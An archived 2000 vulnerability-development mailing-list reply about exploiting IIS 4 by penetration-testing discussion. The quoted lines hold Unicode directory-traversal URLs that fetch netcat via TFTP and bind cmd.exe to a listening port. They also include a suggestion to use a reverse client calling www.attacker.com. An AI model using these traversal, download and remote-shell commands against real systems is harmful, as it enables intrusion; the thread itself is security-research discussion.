Vulnerability Development mailing list archives

Re: dos commands via iis 4 (TFTP)


From: MadHat <madhat () UNSPECIFIC COM>
Date: Wed, 15 Nov 2000 11:02:39 -0600

"Bluefish (P.Magnusson)" wrote:

> > http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe
> > http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe
> > So after this, there is a port open (22 in this case as many admins will
> > leave this open for SSH, but this is an NT box, which as we know rarely
> > has SSH running on it) that I can telnet to and have a command prompt.

> A more reliable attack, though, would be to download and execute a client
> which connects to www.attacker.com:80, only port 80 won't be running a
> webserver but a server for the client.
>
> That way it will overcome more firewalls; only an application level
> firewall or a closed DMZ would cause problems, whereas the attack you
> describe relies on some server port not being firewalled.

right, but this is all about misconfiguration.  If nothing is
misconfigured, and all patches are up to date, then you don't even get
this far.  The point was that once nc.exe is on the box, you can pick
and choose the port(s) you want to bind to depending on the situation
and the ACLs or firewall rules.  I chose 22 because it is often open for
ssh, as I mentioned, but I could have chosen 25 if there wasn't an SMTP
server, but that was not left open in the case I was testing.  This is
just one part of the overall penetration, you would have to know more
info about the target before you can choose how to continue and what
will be best for any particular situation.  I personally like netcat, so
I chose that tool.  It is all personal preference, what you know and
what you feel comfortable using.  There is no "final answer" here.

--
MadHat at unspecific.com
                                   "The 3 great virtues of a programmer:
                                      Laziness, Impatience, and Hubris."
                                                 --Larry Wall

